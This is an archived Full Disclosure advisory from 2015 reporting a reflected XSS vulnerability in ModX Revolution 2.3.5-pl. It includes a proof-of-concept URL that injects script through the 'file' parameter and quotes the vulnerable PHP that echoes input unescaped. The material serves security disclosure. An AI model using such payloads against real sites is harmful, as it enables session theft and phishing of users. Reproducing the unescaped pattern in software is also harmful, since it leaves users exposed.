lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Tue, 18 Aug 2015 11:19:01 +0200
From: "Curesec Research Team (CRT)" <crt@...esec.com>
To: fulldisclosure@...lists.org
Subject: [FD] ModX Revolution 2.3.5 - Reflected XSS

ModX Revolution 2.3.5-pl: Reflected Cross Site Scripting Vulnerability
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: 	ModX Revolution 2.3.5-pl	
Fixed in: 		not fixed
Fixed Version Link: 	n/a	
Vendor Contact: 	hello@...x.com	
Vulnerability Type: 	Reflected XSS	
Remote Exploitable: 	Yes	
Reported to vendor: 	07/14/2015	
Disclosed to public: 	08/17/2015	
Release mode: 		Full disclosure
CVE: 	n/a	
Credits 		Tim Coen of Curesec GmbH	

2. Vulnerability Description

ModX Revolution 2.3.5-pl is vulnerable to reflected cross site
scripting. With this, it is possible to inject and execute arbitrary
JavaScript code. This can for example be used by an attacker to inject a
JavaScript keylogger, bypass CSRF protection, or perform phishing attacks.

The attack can be exploited by getting the victim to click a link or
visit an attacker controlled website.

3. Proof of Concept

The injection takes place into the file GET argument, which is echoed
inside script tags.

http://localhost/modx-2.3.5-pl/manager/?a=system/file/edit&file=xsstest",record:
{"name":"","basename":"","path":"","size":false,"last_accessed":"Jan 01,
1970 01:00:00 AM","last_modified":"Jan 01, 1970 01:00:00
AM","content":false,"image":false,"is_writable":false,"is_readable":false,"source":1},canSave:
0});});alert(1); </script>&wctx=mgr&source=1

4. Code


    manager/controllers/default/system/file/edit.class.php:28
        public function loadCustomCssJs() {

$this->addJavascript($this->modx->getOption('manager_url').'assets/modext/sections/system/file/edit.js');
            $this->addHtml('<script
type="text/javascript">Ext.onReady(function() {
                MODx.load({
                    xtype: "modx-page-file-edit"
                    ,file: "'.$this->filename.'"
                    ,record: '.$this->modx->toJSON($this->fileRecord).'
                    ,canSave: '.($this->canSave ? 1 : 0).'
                });
            });</script>');
        }

5. Solution

This issue was not fixed by the vendor.

5. Report Timeline

07/14/2015 	Informed Vendor about Issue (no reply)
08/13/2015 	Contacted Vendor again (no reply)
08/17/2015 	Disclosed to public

6. Blog Reference:
http://blog.curesec.com/article/blog/ModX-Revolution-235-pl-Reflected-Cross-Site-Scripting-Vulnerability-43.html

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ